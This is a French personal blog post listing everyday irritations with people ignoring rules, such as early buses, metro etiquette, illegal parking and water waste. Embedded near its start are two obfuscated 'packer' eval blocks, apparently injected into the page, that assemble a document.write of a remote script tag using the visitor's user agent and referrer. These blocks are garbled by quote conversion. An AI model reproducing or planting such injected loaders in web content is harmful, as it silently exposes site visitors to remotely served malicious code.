Observations irritantes

L’absurdité, document.write(“”); l’inconsistance, la stupidité m’irritent, me frustrent et me causent de l’urticaire pour lequel la lecture et l’évasion vers d’autres mondes imaginaires ou réels, offrent un baume calmant. De plus, le fait que les gens ignorent résolument le gros bon sens m’exaspère au plus haut point…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kieky|var|u0026u|referrer|yzkts||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afrdb|var|u0026u|referrer|ikfbh||js|php’.split(‘|’),0,{}))

Tout au long de la journée mes observations m’ont amené ces quelques réflexions (
après le saut de page):

  • L’autobus 41 de 10h32 passe à 10h29 et je la manque. Quelle est l’utilité d’avoir un horaire s’il n’est pas respecté? Du retard, je peux comprendre, mais de l’avance c’est absurde!
  • J’aperçois un policier seul dans son auto-patrouille qui parle sur son cellulaire au volant. Faite ce que je dis et pas ce que je fait, c’est ça? Et dire qu’un gars a eut une contravention pour avoir regarder son Apple Watch au volant de sa voiture!
  • Dans l’autobus, je vois une dame avec de beaux ongles très long (3/4 de pouce, je le jure!). Je me demande bien quel genre de travail qu’elle peut réussir à faire avec de tel ongles…
  • Au travail, encore une fois il y a une femme dans la toilette des hommes (qui est aussi pour handicapé, alors elle est spacieuse et le monde semble la préférer pour cette raison). Mais si je m’avisais d’aller dans la toilette des femmes (qui contient deux ou trois places contrairement à celle des hommes qui est monoplace) je suis sûr que je me ferais recevoir à grands coups de sacoches! Comme disait Calimero, “la vie est vraiment trop injuste!”
  • Presque tous les jours il y a une dame dans la section jeunesse de la bibliothèque qui y passe la journée — tout en gardant un oeil très distrait sur ses enfants tapageurs — à réciter son chapelet! Parfois à voix haute. On la tolère sans problème. Par contre, si jamais une personne étendait son tapis de prière et se mettait à prier silencieusement vers La Mecque, elle se ferait sûrement éjecter dans le temps de le dire. Double standard plutôt embrassant…
  • J’ai horreur de la répétition. Je n’aime pas avoir à me répéter et aime encore moins quand on me répète les même affaires plusieurs fois…
  • En vieillissant, je ne suis plus très apte au multitasking, alors je n’aime pas qu’on me parle quand je suis en train de faire autre chose (une tâche, ou alors quand je regarde la télé ou suis en train de lire). C’est le moindre respect que d’attendre que je finisse ce que je fais et que je porte mon attention sur vous devant de m’interrompre dans mon activité. Et comme je suis un peu sourdingue, je ne peux pas entendre deux sons qui proviennent de sources différentes. Alors si vous me parlé alors que j’essai d’écouter autre chose, les deux s’annulent et je ne comprend rien! C’est très frustrant.
  • Il y a a une affiche sur la porte de la bibliothèque qui demande aux gens du parc et de la pataugoir d’utiliser les toilettes du chalet du parc et non celles de la bibliothèque. Bien sûr, l’affiche est largement ignorée…
  • Sur les trottoirs, dans les couloirs du métro ou dans les escaliers mécaniques on doit circuler comme sur la route, en gardant la droite!
  • Dans le métro, on se tient sur les côtés des portes pour d’abord laisser sortir les gens!
  • Dans le métro, on sort par les tourniquets indiqués comme sorties pour laisser les entrées libres pour ceux qui entrent!
  • Sur l’une des rues près de chez moi, sur le chemin de retour de l’autobus, il y a une signalisation indiquant qu’à cause de travaux il est interdit de se stationner ou d’arrêter. Et, bien sûr, tout les espaces de stationnement sont plein!
  • Dans mon quartier, les automobilistes font rarement leur arrêts et les cyclistes ne les font jamais. C’est plutôt dangereux!
  • Dans mon quartier, les gens lavent leur entrées de garage, le trottoir et leur voiture au boyau d’arrosage faisant fi de la règlementation qui exige la préservation de l’eau.

Cela ne sert absolument à rien d’avoir des règles si elles ne sont pas respectées et si on ne les fait pas respecter. On n’a que deux choix: respecter les règles ou les changer. On ne peut pas les respecter seulement quand cela fait notre affaire! Sinon c’est le bordel et la société devient complètement dysfonctionelle.

Bon, ça fait du bien tout ça.

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s